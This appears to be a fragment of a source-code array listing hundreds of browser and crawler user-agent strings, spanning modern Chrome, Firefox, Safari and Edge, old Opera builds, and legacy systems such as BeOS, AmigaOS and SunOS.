"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393",
"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1", "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","AppleTV5,3/9.1.1","Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Dalvik/2.1.0 (Linux; U; Android 6.0.1; Nexus Player Build/MMB29T)","Chrome 19.0.1084.9 (64 bit)" ,
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2","Chrome 20.0.1132.57 (CrOS)" ,
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9" ,
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre" ,
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", "Links/0.9.1 (Linux 2.4.24; i386;)", "ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33)" , "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0", "Mozilla/2.02E (Win95; U)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Maxthon 2.0)" ,
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14", "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0 Iceweasel/19.0.2" , "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko","Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", "w3m/0.5.1" , "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393","Mozilla/5.0 (Nintendo WiiU) AppleWebKit/536.30 (KHTML, like Gecko) NX/3.0.4.2.12 NintendoBrowser/4.3.1.11264.US","Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586","Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7412.EU",
"Mozilla/5.0 (Amiga; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14",
"Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en-US; rv:1.8.1.21) Gecko/20090303 SeaMonkey/1.1.15",
"Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14",
"Mozilla/5.0 (Android 2.2; Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4",
"Mozilla/5.0 (BeOS; U; BeOS BeBox; fr; rv:1.9) Gecko/2008052906 BonEcho/2.0",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.1) Gecko/20061220 BonEcho/2.0.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.10) Gecko/20071128 BonEcho/2.0.0.10",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.17) Gecko/20080831 BonEcho/2.0.0.17",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.6) Gecko/20070731 BonEcho/2.0.0.6",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.7) Gecko/20070917 BonEcho/2.0.0.7",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1b2) Gecko/20060901 Firefox/2.0b2",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a",
"Mozilla/5.0 (BeOS; U; Haiku BePC; en-US; rv:1.8.1.10pre) Gecko/20080112 SeaMonkey/1.1.7pre",
"Mozilla/5.0 (BeOS; U; Haiku BePC; en-US; rv:1.8.1.14) Gecko/20080429 BonEcho/2.0.0.14",
"Mozilla/5.0 (BeOS; U; Haiku BePC; en-US; rv:1.8.1.17) Gecko/20080831 BonEcho/2.0.0.17",
"Mozilla/5.0 (BeOS; U; Haiku BePC; en-US; rv:1.8.1.18) Gecko/20081114 BonEcho/2.0.0.18",
"Mozilla/5.0 (BeOS; U; Haiku BePC; en-US; rv:1.8.1.21pre) Gecko/20090218 BonEcho/2.0.0.21pre",
"Mozilla/5.0 (Darwin; FreeBSD 5.6; en-GB; rv:1.8.1.17pre) Gecko/20080716 K-Meleon/1.5.0",
"Mozilla/5.0 (Darwin; FreeBSD 5.6; en-GB; rv:1.9.1b3pre)Gecko/20081211 K-Meleon/1.5.2",
"Mozilla/5.0 (Future Star Technologies Corp.; Star-Blade OS; x86_64; U; en-US) iNet Browser 4.7",
"Mozilla/5.0 (Linux 2.4.18-18.7.x i686; U) Opera 6.03 [en]",
"Mozilla/5.0 (Linux 2.4.18-ltsp-1 i686; U) Opera 6.1 [en]",
"Mozilla/5.0 (Linux 2.4.19-16mdk i686; U) Opera 6.11 [en]",
"Mozilla/5.0 (Linux 2.4.21-0.13mdk i686; U) Opera 7.11 [en]",
"Mozilla/5.0 (Linux i686 ; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.70",
"Mozilla/5.0 (Linux i686; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0",
"Mozilla/5.0 (Linux i686; U; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51",
"Mozilla/5.0 (Linux) Gecko Iceweasel (Debian) Mnenhy",
"Mozilla/5.0 (Linux; U) Opera 6.02 [en]",
"Mozilla/5.0 (Linux; U; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13",
"Mozilla/5.0 (MSIE 7.0; Macintosh; U; SunOS; X11; gu; SV1; InfoPath.2; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)",
"Mozilla/5.0 (Macintosh; ; Intel Mac OS X; fr; rv:1.8.1.1) Gecko/20061204 Opera",
"Mozilla/5.0 (Macintosh; I; Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4",
"Mozilla/5.0 (Macintosh; I; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20061204 Firefox/3.0a1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20110608 SeaMonkey/2.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b11) Gecko/20110209 Firefox/ SeaMonkey/2.1b2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0a2) Gecko/20111101 Firefox/9.0a2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.31 (KHTML, like Gecko) Chrome/13.0.748.0 Safari/534.31",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.801.0 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.151 Safari/535.19",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6) AppleWebKit/531.4 (KHTML, like Gecko) Version/4.0.3 Safari/531.4",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1200.0 Iron/21.0.1200.0 Safari/537.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_3) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.32 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_3) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.698.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.6) Gecko/20100101 Firefox/10.0.6 Iceweasel/10.0.6",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.7) Gecko/20100101 Firefox/10.0.7 Iceweasel/10.0.7",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0a2) Gecko/20111118 Firefox/10.0a2 Iceweasel/10.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Debian Iceweasel/14.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20120721 Debian Iceweasel/15.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0 Iceweasel/13.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1 Iceweasel/13.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0 Iceweasel/14.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Iceweasel/14.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0 Iceweasel/15.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1 Iceweasel/15.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20120724 Debian Iceweasel/15.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20110506 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20110609 Firefox/4.0.1 SeaMonkey/2.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0b4) Gecko/20100818 Firefox/4.0b4",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0b9pre) Gecko/20110111 Firefox/4.0b9pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:6.0.1) Gecko/20110831 conkeror/0.9.3",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 Iceweasel/7.0.1 Debian",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110602 Firefox/7.0a1 SeaMonkey/2.2a1pre Lightning/1.1a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Iceweasel/9.0.1",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux) KHTML/4.9.1 (like Gecko) Konqueror/4.9",
"Mozilla/5.0 (X11; Linux; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Midori/0.4",
"Mozilla/5.0 (X11; U; AIX 0048013C4C00; en-US; rv:1.0.1) Gecko/20021009 Netscape/7.0",
"Mozilla/5.0 (X11; U; AIX 005A471A4C00; en-US; rv:1.0rc2) Gecko/20020514",
"Mozilla/5.0 (X11; U; AIX 5.3; en-US; rv:1.7.12) Gecko/20051025",
"Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.339",
"Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.339 Safari/534.10",
"Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.341 Safari/534.10"
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.4) Gecko/20070704 Firefox/2.0.0.6",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.4) Gecko/20071127 Firefox/2.0.0.11",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.6) Gecko/20070819 Firefox/2.0.0.6",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.7) Gecko/20070930 Firefox/2.0.0.7",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.2.8) Gecko/20101230 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; OpenBSD ppc; en-US; rv:1.8.0.10) Gecko/20070223 Firefox/1.5.0.10",
"Mozilla/5.0 (X11; U; OpenBSD ppc; en-US; rv:1.8.1.4) Gecko/20070223 BonEcho/2.0.0.4",
"Mozilla/5.0 (X11; U; OpenBSD ppc; en-US; rv:1.8.1.9) Gecko/20070223 BonEcho/2.0.0.9",
"Mozilla/5.0 (X11; U; OpenBSD sparc64; en-AU; rv:1.8.1.6) Gecko/20071225 Firefox/2.0.07",
"Mozilla/5.0 (X11; U; OpenBSD sparc64; en-US; rv:1.8.1.6) Gecko/20070816 Firefox/2.0.0.6",
"Mozilla/5.0 (X11; U; OpenBSD sparc64; pl-PL; rv:1.8.0.2) Gecko/20060429 Firefox/1.5.0.2",
"Mozilla/5.0 (X11; U; Slackware Linux i686; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10",
"Mozilla/5.0 (X11; U; Slackware Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.30 Safari/532.5",
"Mozilla/5.0 (X11; U; SunOS 5.11; en-US; rv:1.8.0.2) Gecko/20050405 Epiphany/1.7.1",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20041221",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20050502",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20051027",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20051122",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20060627",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7.12) Gecko/20051121 Firefox/1.0.7 (Nexenta package 1.0.7)",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7.5) Gecko/20041109 Firefox/1.0",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.0.5) Gecko/20060728 Firefox/1.5.0.5",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1) Gecko/20061211 Firefox/2.0",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.3) Gecko/20070423 Firefox/2.0.0.3",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.4) Gecko/20070622 Firefox/2.0.0.4",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-ZW; rv:1.8.1.6) Gecko/20071125 Firefox/2.0.0.6",
"Mozilla/5.0 (X11; U; SunOS i86pc; fr; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4",
"Mozilla/5.0 (X11; U; SunOS sun4u; de-DE; rv:0.9.4.1) Gecko/20020518 Netscape6/6.2.3",
"Mozilla/5.0 (X11; U; SunOS sun4u; de-DE; rv:1.7) Gecko/20070606",
"Mozilla/5.0 (X11; U; SunOS sun4u; de-DE; rv:1.8.1.6) Gecko/20070805 Firefox/2.0.0.6",
"Mozilla/5.0 (X11; U; SunOS sun4u; de-DE; rv:1.9.1b4) Gecko/20090428 Firefox/2.0.0.0",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-GB; rv:1.8.0.1) Gecko/20060206 Firefox/1.5.0.1",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.2) Gecko/20011002 Netscape6/6.1",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4) Gecko/20011206 Netscape6/6.2.1",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020406 Netscape6/6.2.2",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020518 Netscape6/6.2.3",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.0) Gecko/20020611",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.1) Gecko/20020719 Netscape/7.0",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.1) Gecko/20020920 Netscape/7.0",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.1) Gecko/20020921 Netscape/7.0",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.1) Gecko/20020827",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.1) Gecko/20020909",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.1) Gecko/20020925",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.2.1) Gecko/20021205",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.2.1) Gecko/20021212",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.2.1) Gecko/20021217"
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.2.1) Gecko/20021217"
"Opera/9.10 (X11; Linux i686; U; kubuntu;pl)",
"Opera/9.10 (X11; Linux i686; U; pl)",
"Opera/9.10 (X11; Linux x86_64; U; en)",
"Opera/9.10 (X11; Linux; U; en)",
"Opera/9.12 (Windows NT 5.0; U)",
"Opera/9.12 (Windows NT 5.0; U; ru)",
"Opera/9.12 (X11; Linux i686; U; en) (Ubuntu)",
"Opera/9.20 (Windows NT 5.1; U; MEGAUPLOAD=1.0; es-es)",
"Opera/9.20 (Windows NT 5.1; U; en)",
"Opera/9.20 (Windows NT 5.1; U; es-AR)",
"Opera/9.20 (Windows NT 5.1; U; es-es)",
"Opera/9.20 (Windows NT 5.1; U; it)",
"Opera/9.20 (Windows NT 5.1; U; nb)",
"Opera/9.20 (Windows NT 5.1; U; zh-tw)",
"Opera/9.20 (Windows NT 5.2; U; en)",
"Opera/9.20 (Windows NT 6.0; U; de)",
"Opera/9.20 (Windows NT 6.0; U; en)",
"Opera/9.20 (Windows NT 6.0; U; es-es)",
"Opera/9.20 (X11; Linux i586; U; en)",
"Opera/9.20 (X11; Linux i686; U; en)",
"Opera/9.20 (X11; Linux i686; U; es-es)",
"Opera/9.20 (X11; Linux i686; U; pl)",
"Opera/9.20 (X11; Linux i686; U; ru)",
"Opera/9.20 (X11; Linux i686; U; tr)",
"Opera/9.20 (X11; Linux ppc; U; en)",
"Opera/9.20 (X11; Linux x86_64; U; en)",
"Opera/9.20(Windows NT 5.1; U; en)",
"Opera/9.21 (Macintosh; Intel Mac OS X; U; en)",
"Opera/9.21 (Macintosh; PPC Mac OS X; U; en)",
"Opera/9.21 (Windows 98; U; en)",
"Opera/9.21 (Windows NT 5.0; U; de)",
"Opera/9.21 (Windows NT 5.1; U; MEGAUPLOAD 1.0; en)",
"Opera/9.21 (Windows NT 5.1; U; SV1; MEGAUPLOAD 1.0; ru)",
"Opera/9.21 (Windows NT 5.1; U; de)",
"Opera/9.21 (Windows NT 5.1; U; en)",
"Opera/9.21 (Windows NT 5.1; U; fr)",
"Opera/9.21 (Windows NT 5.1; U; nl)",
"Opera/9.21 (Windows NT 5.1; U; pl)",
"Opera/9.21 (Windows NT 5.1; U; pt-br)",
"Opera/9.21 (Windows NT 5.1; U; ru)",
"Opera/9.21 (Windows NT 5.2; U; en)",
"Opera/9.21 (Windows NT 6.0; U; en)",
"Opera/9.21 (Windows NT 6.0; U; nb)",
"Opera/9.21 (X11; Linux i686; U; de)",
"Opera/9.21 (X11; Linux i686; U; en)",
"Opera/9.21 (X11; Linux i686; U; es-es)",
"Opera/9.22 (X11; OpenBSD i386; U; en)",
"Opera/9.23 (Mac OS X; fr)",
"Opera/9.23 (Mac OS X; ru)",
"Opera/9.23 (Macintosh; Intel Mac OS X; U; ja)",
"Opera/9.23 (Nintendo Wii; U; ; 1038-58; Wii Internet Channel/1.0; en)",
"Opera/9.23 (Windows NT 6.0; U; de)",
"Opera/9.24 (X11; SunOS i86pc; U; en)",
"Opera/9.25 (Macintosh; Intel Mac OS X; U; en)",
"Opera/9.25 (Macintosh; PPC Mac OS X; U; en)",
"Opera/9.25 (OpenSolaris; U; en)",
"Opera/9.25 (X11; Linux i686; U; fr)",
"Opera/9.25 (X11; Linux i686; U; fr-ca)",
